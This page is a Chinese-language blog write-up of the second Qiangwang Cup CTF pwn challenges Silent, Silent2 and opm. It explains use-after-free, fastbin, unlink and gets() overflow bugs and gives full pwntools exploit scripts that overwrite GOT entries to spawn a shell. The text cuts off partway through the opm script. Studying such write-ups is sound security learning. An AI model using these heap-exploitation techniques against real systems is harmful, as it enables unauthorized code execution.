<!DOCTYPE html>
<html>
<head>
  <meta name="referrer" content="no-referrer" />
  <!--解决简书外链403-->
  <meta charset="utf-8">
  <meta name="baidu-site-verification" content="L6Lm9d5Crl"/>
  
  
  
  
  <title>第二届强网杯pwn writeup【部分】 | Hacked By Fish_o0O</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="0x00 前言看神仙打架系列，题太多了，自己太菜了，还是只有沦落到赛后复现大佬们的Write Up的地步了，什么时候才能在比赛中做出来几道pwn题呢">
<meta property="og:type" content="article">
<meta property="og:title" content="第二届强网杯pwn writeup【部分】">
<meta property="og:url" content="http://fish-o0o.github.io/2020/03/12/%E7%AC%AC%E4%BA%8C%E5%B1%8A%E5%BC%BA%E7%BD%91%E6%9D%AFpwn%20writeup%E3%80%90%E9%83%A8%E5%88%86%E3%80%91/index.html">
<meta property="og:site_name" content="Hacked By Fish_o0O">
<meta property="og:description" content="0x00 前言看神仙打架系列，题太多了，自己太菜了，还是只有沦落到赛后复现大佬们的Write Up的地步了，什么时候才能在比赛中做出来几道pwn题呢">
<meta property="og:locale" content="zh">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/8447551-2dc0d6df20ed6060.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/8447551-a51f6af9e654129b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/8447551-cbbae21b44a2a86f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/8447551-113ac1f8602bd5be.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/8447551-fa947dba98ac4b06.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/8447551-8309ff39c467c6dd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/8447551-57f70e10e520e9a6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/8447551-65afdd29f0019e73.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="article:published_time" content="2020-03-12T20:30:43.943Z">
<meta property="article:modified_time" content="2020-03-12T18:59:42.617Z">
<meta property="article:author" content="Fish_o0O">
<meta property="article:tag" content="Pwn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://upload-images.jianshu.io/upload_images/8447551-2dc0d6df20ed6060.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
  
    <link rel="alternative" href="/atom.xml" title="Hacked By Fish_o0O" type="application/atom+xml">
  
  
    <link rel="icon" href="/img/favicon.png">
  
  
  
<link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">
  <link rel="apple-touch-icon" href="/apple-touch-icon.png">
  
  
      <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  
  <!-- 加载特效 -->
    <script src="/js/pace.js"></script>
    <link href="/css/pace/pace-theme-flash.css" rel="stylesheet" />
  <script>
      var yiliaConfig = {
          fancybox: true,
          animate: true,
          isHome: false,
          isPost: true,
          isArchive: false,
          isTag: false,
          isCategory: false,
          open_in_new: false
      }
  </script>
<meta name="generator" content="Hexo 4.2.0"></head>

<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        
<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>

        <a href="/" class="profilepic">
            
            <img lazy-src="/img/avatar.png" class="js-avatar">
            
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/">Fish_o0O</a></h1>
        </hgroup>
        
        <p class="header-subtitle">KEEEEEEEEEP STUDY！</p>
        
        
            <form>
                <input type="text" class="st-default-search-input search" id="local-search-input" placeholder="搜索一下" autocomplete="off">
            </form>
            <div id="local-search-result"></div>
        
        
            <script type="text/javascript">
                (function() {
                    'use strict';
                    function getMatchData(keyword, data) {
                        var matchData = [];
                        for(var i =0;i<data.length;i++){
                            if(data[i].title.toLowerCase().indexOf(keyword)>=0) 
                                matchData.push(data[i])
                        }
                        return matchData;
                    }
                    var $input = $('#local-search-input');
                    var $resultContent = $('#local-search-result');
                    $input.keyup(function(){
                        $.ajax({
                            url: '/search.json',
                            dataType: "json",
                            success: function( json ) {
                                var str='<ul class=\"search-result-list\">';                
                                var keyword = $input.val().trim().toLowerCase();
                                $resultContent.innerHTML = "";
                                if ($input.val().trim().length <= 0) {
                                    $resultContent.empty();
                                    $('#switch-area').show();
                                    return;
                                }
                                var results = getMatchData(keyword, json);
                                if(results.length === 0){
                                    $resultContent.empty();
                                    $('#switch-area').show();
                                    return;
                                } 
                                for(var i =0; i<results.length; i++){
                                    str += "<li><a href='"+ results[i].url +"' class='search-result-title'>"+ results[i].title +"</a></li>";
                                }
                                str += "</ul>";
                                $resultContent.empty();
                                $resultContent.append(str);
                                $('#switch-area').hide();
                            }
                        });
                    });
                })();
            </script>
        
        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        
        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a  href="/about/">关于我</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fl github"  target="_blank" href="/Fish_o0O" title="github">github</a>
                            
                        </ul>
                    </nav>
                </section>
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <a href="/tags/Pwn/" style="font-size: 20px;">Pwn</a> <a href="/tags/Vulnerability/" style="font-size: 10px;">Vulnerability</a> <a href="/tags/%E9%9A%8F%E7%AC%94/" style="font-size: 15px;">随笔</a>
                    </div>
                </section>
                
                
                
                
                <section class="switch-part switch-part3">
                
                    <div id="js-aboutme">一个被兴趣牵着鼻子走的菜鸡</div>
                </section>
                
            </div>
        </div>
    </header>
</div>

    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页">Fish_o0O</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                
                    <img lazy-src="/img/avatar.png" class="js-avatar">
                
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页">Fish_o0O</a></h1>
            </hgroup>
            
            <p class="header-subtitle">KEEEEEEEEEP STUDY！</p>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/about/">关于我</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                <div class="social">
                    
                        <a class="github" target="_blank" href="/Fish_o0O" title="github">github</a>
                    
                </div>
            </nav>
        </header>
    </div>
</nav>
      <div class="body-wrap"><article id="post-第二届强网杯pwn writeup【部分】" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a  href="/2020/03/12/%E7%AC%AC%E4%BA%8C%E5%B1%8A%E5%BC%BA%E7%BD%91%E6%9D%AFpwn%20writeup%E3%80%90%E9%83%A8%E5%88%86%E3%80%91/" class="article-date">
      <time datetime="2020-03-12T20:30:43.943Z" itemprop="datePublished">2020-03-12</time>
</a>

    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      第二届强网杯pwn writeup【部分】
    </h1>
  


      </header>
      
      <div class="article-info article-info-post">
        

        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Pwn/" rel="tag">Pwn</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <h2 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h2><p>看神仙打架系列，题太多了，自己太菜了，还是只有沦落到赛后复现大佬们的Write Up的地步了，什么时候才能在比赛中做出来几道pwn题呢</p>
<a id="more"></a>
<h2 id="0x01-Silent"><a href="#0x01-Silent" class="headerlink" title="0x01 Silent"></a>0x01 Silent</h2><ul>
<li><strong>漏洞位置</strong></li>
</ul>
<p><strong>del</strong>函数<strong>free</strong>掉堆块后没有清空指针造成了<strong>dangling_ptr</strong>。并且<strong>edit</strong>函数在使用时没有检查堆块是否已经<strong>free</strong>。</p>
<ul>
<li><strong>利用思路</strong><br>利用<strong>UAF</strong>构造<strong>fastbin attack</strong>。申请堆块，释放堆块进入<strong>fastbin</strong>，<strong>edit</strong>释放的堆块，修改其中的<strong>fd</strong>到<strong>got</strong>表上去，再申请回来，修改<strong>got</strong>表。<blockquote>
<p><strong>Fastbin Attack</strong><br>在<strong>malloc</strong>回来的时候会检查<strong>size</strong>位，看这个堆块是不是属于该<strong>Fastbin</strong>中，不过只检查低<strong>4字节</strong>，如果<strong>size</strong>位为<strong>61</strong>，那么检查时<strong>61-6f</strong>都能通过。</p>
</blockquote>
</li>
<li><strong>my-exp</strong><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">local = <span class="number">1</span></span><br><span class="line"><span class="keyword">if</span> local:</span><br><span class="line">	p = process(<span class="string">'./silent'</span>)</span><br><span class="line">	libc = ELF(<span class="string">'/lib/x86_64-linux-gnu/libc-2.23.so'</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">	p = remote(<span class="string">'39.107.32.132'</span> , <span class="number">10000</span>)<span class="comment">#nc 39.107.32.132 10000</span></span><br><span class="line">	libc = ELF(<span class="string">'/lib/x86_64-linux-gnu/libc-2.23.so'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(length , text)</span>:</span></span><br><span class="line">	p.sendline(<span class="string">'1'</span>)</span><br><span class="line">	sleep(<span class="number">0.3</span>)</span><br><span class="line">	p.sendline(str(length))</span><br><span class="line">	sleep(<span class="number">0.3</span>)</span><br><span class="line">	p.sendline(text)</span><br><span class="line">	sleep(<span class="number">0.3</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dele</span><span class="params">(num)</span>:</span></span><br><span class="line">	p.sendline(<span class="string">'2'</span>)</span><br><span class="line">	sleep(<span class="number">0.3</span>)</span><br><span class="line">	p.sendline(str(num))</span><br><span class="line">	sleep(<span class="number">0.3</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span><span class="params">(num , text)</span>:</span></span><br><span class="line">	p.sendline(<span class="string">'3'</span>)</span><br><span class="line">	sleep(<span class="number">0.3</span>)</span><br><span class="line">	p.sendline(str(num))</span><br><span class="line">	sleep(<span class="number">0.3</span>)</span><br><span class="line">	p.sendline(text)</span><br><span class="line">	sleep(<span class="number">0.3</span>)</span><br><span class="line">	p.sendline(<span class="string">''</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">debug</span><span class="params">()</span>:</span></span><br><span class="line">	<span class="keyword">print</span> pidof(p)[<span class="number">0</span>]</span><br><span class="line">	raw_input()</span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">'./silent'</span>)</span><br><span class="line">p.recvuntil(<span class="string">'==+RWBXtIRRV+.+IiYRBYBRRYYIRI;VitI;=;..........:::.::;::::...;;;:.'</span>)</span><br><span class="line">fake_chunk = <span class="number">0x601ffa</span></span><br><span class="line">system_plt = <span class="number">0x400730</span></span><br><span class="line">success(<span class="string">'fake_chunk =&gt; '</span> + hex(fake_chunk))</span><br><span class="line">success(<span class="string">'system_plt =&gt; '</span> + hex(system_plt))</span><br><span class="line">add(<span class="number">0x50</span> , <span class="string">'a'</span> * <span class="number">0x4f</span>)<span class="comment">#chunk 0	rabbish</span></span><br><span class="line">add(<span class="number">0x50</span> , <span class="string">'b'</span> * <span class="number">0x4f</span>)<span class="comment">#chunk 1	rabbish</span></span><br><span class="line">add(<span class="number">0x50</span> , <span class="string">'c'</span> * <span class="number">0x4f</span>)</span><br><span class="line"><span class="comment">#debug()</span></span><br><span class="line">dele(<span class="number">0</span>)<span class="comment">#fastbin-&gt;chunk0</span></span><br><span class="line">dele(<span class="number">1</span>)<span class="comment">#fastbin-&gt;chunk1-&gt;chunk0</span></span><br><span class="line">debug()</span><br><span class="line">dele(<span class="number">0</span>)<span class="comment">#fastbin-&gt;chunk0-&gt;chunk1-&gt;chunk0</span></span><br><span class="line">add(<span class="number">0x50</span> , p64(fake_chunk))<span class="comment">#fastbin-&gt;chunk1-&gt;chunk0-&gt;0x601ffa	fd</span></span><br><span class="line">add(<span class="number">0x50</span> , <span class="string">'/bin/sh\x00'</span>)<span class="comment">#fastbin-&gt;chunk0-&gt;0x601ffa	rabbish</span></span><br><span class="line">add(<span class="number">0x50</span> , <span class="string">'c'</span> * <span class="number">0x4f</span>)<span class="comment">#fastbin-&gt;0x601ffa	command(chunk1)</span></span><br><span class="line">add(<span class="number">0x50</span> , <span class="string">'A'</span> * <span class="number">0xe</span> + p64(system_plt))<span class="comment">#free=&gt;system</span></span><br><span class="line">dele(<span class="number">1</span>)<span class="comment">#free(chunk1)=&gt;system('/bin/sh\x00')</span></span><br><span class="line"><span class="comment">#debug()</span></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
</li>
</ul>
<hr>
<h2 id="0x02-Silent2"><a href="#0x02-Silent2" class="headerlink" title="0x02 Silent2"></a>0x02 Silent2</h2><ul>
<li><strong>漏洞位置</strong><br>几乎和<strong>Silent</strong>一样的，一个<strong>dangling_ptr</strong>，一个<strong>UAF</strong>，不过在申请堆块的时候做了限制，，需要大于<strong>0x7f</strong>，即不能在<strong>fastbin</strong>的范围内。</li>
<li><strong>利用思路</strong><br>有<strong>UAF</strong>和<strong>dangling_ptr</strong>自然是构造<strong>unlink</strong>。<blockquote>
<p>论<strong>sleep</strong>的重要性<br>经过这到题，我领悟到了<strong>sleep</strong>的重要性，尤其是这种没有信息交互的地方更是致命，明明各种条件都构造好了，都满足了，却迟迟不能稳定起<strong>shell</strong>，最后<strong>sleep</strong>之后就顺利稳定起<strong>shell</strong>了。</p>
</blockquote>
</li>
<li><strong>my-exp</strong><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">local = <span class="number">1</span></span><br><span class="line"><span class="keyword">if</span> local:</span><br><span class="line">	p = process(<span class="string">'./silent2'</span>)</span><br><span class="line">	libc = ELF(<span class="string">'/lib/x86_64-linux-gnu/libc-2.23.so'</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">	p = remote(<span class="string">'39.107.32.132'</span> , <span class="number">10001</span>)<span class="comment">#nc 39.107.32.132 10001</span></span><br><span class="line">	libc = ELF(<span class="string">'/lib/x86_64-linux-gnu/libc-2.23.so'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(length , text)</span>:</span></span><br><span class="line">	p.sendline(<span class="string">'1'</span>)</span><br><span class="line">	sleep(<span class="number">0.1</span>)</span><br><span class="line">	p.sendline(str(length))</span><br><span class="line">	sleep(<span class="number">0.1</span>)</span><br><span class="line">	p.sendline(text)</span><br><span class="line">	sleep(<span class="number">0.1</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dele</span><span class="params">(num)</span>:</span></span><br><span class="line">	p.sendline(<span class="string">'2'</span>)</span><br><span class="line">	sleep(<span class="number">0.1</span>)</span><br><span class="line">	p.sendline(str(num))</span><br><span class="line">	sleep(<span class="number">0.1</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span><span class="params">(num , text)</span>:</span></span><br><span class="line">	p.sendline(<span class="string">'3'</span>)</span><br><span class="line">	sleep(<span class="number">0.1</span>)</span><br><span class="line">	p.sendline(str(num))</span><br><span class="line">	sleep(<span class="number">0.1</span>)</span><br><span class="line">	p.sendline(text)</span><br><span class="line">	sleep(<span class="number">0.1</span>)</span><br><span class="line">	p.sendline(<span class="string">''</span>)</span><br><span class="line">	sleep(<span class="number">0.1</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">debug</span><span class="params">()</span>:</span></span><br><span class="line">	<span class="keyword">print</span> pidof(p)[<span class="number">0</span>]</span><br><span class="line">	raw_input()</span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">'./silent2'</span>)</span><br><span class="line">chunk0_addr = <span class="number">0x6020d8</span></span><br><span class="line">p.recvuntil(<span class="string">'==+RWBXtIRRV+.+IiYRBYBRRYYIRI;VitI;=;..........:::.::;::::...;;;:.'</span>)</span><br><span class="line">add(<span class="number">0x80</span> , <span class="string">'1'</span> * <span class="number">0x7f</span>)</span><br><span class="line">add(<span class="number">0x80</span> , <span class="string">'/bin/sh\x00'</span>)</span><br><span class="line">add(<span class="number">0x80</span> , <span class="string">'3'</span> * <span class="number">0x7f</span>)</span><br><span class="line">add(<span class="number">0x80</span> , <span class="string">'a'</span> * <span class="number">0x7f</span>)</span><br><span class="line">add(<span class="number">0x80</span> , <span class="string">'b'</span> * <span class="number">0x7f</span>)</span><br><span class="line">add(<span class="number">0x100</span> , <span class="string">'c'</span> * <span class="number">0xff</span>)</span><br><span class="line">add(<span class="number">0x80</span> , <span class="string">'d'</span> * <span class="number">0x7f</span>)</span><br><span class="line">dele(<span class="number">4</span>)</span><br><span class="line">dele(<span class="number">5</span>)</span><br><span class="line">payload = p64(<span class="number">0</span>) + p64(<span class="number">0x110</span>) + p64(chunk0_addr - <span class="number">0x18</span>) + p64(chunk0_addr - <span class="number">0x10</span>)</span><br><span class="line">add(<span class="number">0x190</span> , <span class="string">'e'</span> * <span class="number">0x80</span> + p64(<span class="number">0x110</span>) + p64(<span class="number">0x90</span>) + <span class="string">'e'</span> * <span class="number">0x80</span> + p64(<span class="number">0x90</span>) + p64(<span class="number">0x81</span>))</span><br><span class="line">edit(<span class="number">3</span> , payload)</span><br><span class="line">dele(<span class="number">5</span>)</span><br><span class="line"><span class="comment">#----finish unlink----</span></span><br><span class="line">free_got = elf.got[<span class="string">'free'</span>]</span><br><span class="line">success(<span class="string">'free_got =&gt; '</span> + hex(free_got))</span><br><span class="line">system_plt = elf.plt[<span class="string">'system'</span>]</span><br><span class="line">success(<span class="string">'system_plt =&gt; '</span> + hex(system_plt))</span><br><span class="line">edit(<span class="number">3</span> , p64(free_got))</span><br><span class="line">edit(<span class="number">0</span> , p64(system_plt))</span><br><span class="line">dele(<span class="number">1</span>)</span><br><span class="line"><span class="comment">#debug()</span></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
</li>
</ul>
<hr>
<h2 id="0x03-opm"><a href="#0x03-opm" class="headerlink" title="0x03 opm"></a>0x03 opm</h2><p>分析题目可得出数据结构如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">stru</span>&#123;</span></span><br><span class="line">    <span class="keyword">int</span> (func*)();</span><br><span class="line">    <span class="keyword">char</span> *name_ptr;</span><br><span class="line">    <span class="keyword">int</span> length;</span><br><span class="line">    <span class="keyword">int</span> punches;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<ul>
<li><strong>漏洞位置</strong><br>在<strong>add</strong>函数中存在两个<strong>gets()</strong>函数，存在缓冲区溢出。<br><img src="https://upload-images.jianshu.io/upload_images/8447551-2dc0d6df20ed6060.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="Add"></li>
</ul>
<ul>
<li><strong>利用思路</strong><br>观察栈分布，<strong>gets()</strong>超过<strong>0x80</strong>长度后会覆盖掉栈上的结构体变量，并且<strong>add</strong>函数中有<strong>2</strong>次覆盖的机会，第<strong>1</strong>次覆盖将会影响到<strong>length</strong>的存放，第<strong>2</strong>次覆盖将会影响到<strong>punches</strong>的存放，以及<strong>kill</strong>函数的参数。<br>在<strong>kill</strong>函数中，可以将传进参数<strong>a1 + 8</strong>作为地址中的内容打印出来，以及将<strong>a1 + 0x18</strong>位置的内容以<strong>16</strong>进制的形式打印出来。在我们通过溢出控制传入参数后可以做<strong>leak</strong>。<br><img src="https://upload-images.jianshu.io/upload_images/8447551-a51f6af9e654129b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="kill"><br>从<strong>checksec</strong>中可以看到是保护机制全开的，所以我们需要<strong>leak</strong>出程序段基址和<strong>libc</strong>基址。结合<strong>kill</strong>函数和结构体的数据结构可以初步确定<strong>leak</strong>方式为覆盖如<strong>kill</strong>的参数，使参数<strong>+ 8</strong>放的是函数的<strong>got</strong>表<del>，使参数<strong>+ 0x18</strong>放的是程序段的地址</del>，两次<strong>leak</strong>不需要同时进行。<br><img src="https://upload-images.jianshu.io/upload_images/8447551-cbbae21b44a2a86f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="checksec"><br>难点就在于如何<strong>leak</strong>，由于<strong>gets()</strong>会在输入后面加上<strong>\x00</strong>，所以我们并不能随心所欲地将地址覆盖成我们想要的地址，而只能覆盖成以<strong>00</strong>结尾的地址，这就需要我们事先将<strong>got</strong>表布置在以<strong>08</strong>结尾的地址或将程序段地址布置在以<strong>18</strong>结尾的地址。若我们事先知道程序段的基址的话，可以通过在输入<strong>name_ptr</strong>时轻松地将<strong>got</strong>表布置在<strong>08</strong>的地址。现在需要解决的问题就是如何得到程序段基址，即如何将程序段地址布置在<strong>18</strong>的地址，由于给<strong>punches</strong>赋值是在第二次覆盖掉结构体后，所以不能用<strong>+ 0x18</strong>来进行<strong>leak</strong>，推翻上一段的利用思路。所以我们只能够通过构造指向程序段的指针来利用第一个<strong>%s</strong>进行<strong>leak</strong>。<br>在<strong>leak</strong>出两个地址过后，由于<strong>show</strong>函数会将<strong>add</strong>函数返回的结构体的第一个<strong>8</strong>字节作为函数的入口地址执行该函数，而且<strong>add</strong>的返回值为我们第二次覆盖后的结构体，可控，所以我们可以尝试将该地址指向一个<strong>one_gadget</strong>就能起<strong>shell</strong>了。<br><img src="https://upload-images.jianshu.io/upload_images/8447551-113ac1f8602bd5be.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="Show"></li>
</ul>
<blockquote>
<p><strong>leak</strong>程序段基址<br>根据<strong>WriteUp</strong>分析了半天才看出来是怎么构造的，还是太菜了，这也是为什么这个利用思路写的这么拖沓的原因。。。我们先多<strong>add</strong>几次，将地址抬高到<strong>_d00</strong>的位置，再次<strong>add</strong>时，第一次覆盖结构体时输入<strong>0x81</strong>位，将结构体覆盖为<strong>00xx</strong>，使后面的<strong>name_ptr、length、punches</strong>都写到<strong>00xx</strong>后的地址上去，此时<strong>00xx + 8</strong>为<strong>name_ptr</strong>指针，指向<strong>name</strong>字符串，但这个<strong>name_ptr</strong>的值为<strong><em>d_</em></strong>，若我们能将后面一个字节覆盖成<strong>00</strong>就可以在第二次覆盖结构体时将结构体再次改为<strong>00xx</strong>去，利用<strong>kill</strong>打印出我们事先在<strong>_d00</strong>布置好的程序段地址。此时就利用字节不对齐的方式进行最低位改为<strong>00</strong>的操作，在将<strong>_d00</strong>布置好后的下一次<strong>add</strong>中的第一次覆盖我们将结构体覆盖为<strong>00xx</strong>此次<strong>add</strong>不触发第二次覆盖。然后再在下一次的<strong>add</strong>中的第一次覆盖时，我们将结构体覆盖为<strong>00xx - 15</strong>，覆盖后会在对<strong>length</strong>进行赋值，即<strong>00xx - 15 + 16</strong>进行赋值时，将刚刚的<strong><em>d_</em></strong>最低位(地址为<strong>00xx + 9</strong>)覆盖成<strong>00</strong>然后在第二次覆盖时，将结构体又覆盖会<strong>00xx</strong>，调用<strong>kill</strong>函数即可实现<strong>leak</strong>。<br><img src="https://upload-images.jianshu.io/upload_images/8447551-fa947dba98ac4b06.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="第一次add结束"><br><img src="https://upload-images.jianshu.io/upload_images/8447551-8309ff39c467c6dd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="第二次add结束"></p>
</blockquote>
<ul>
<li><strong>my-exp</strong><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">local = <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> local:</span><br><span class="line">    p = process(<span 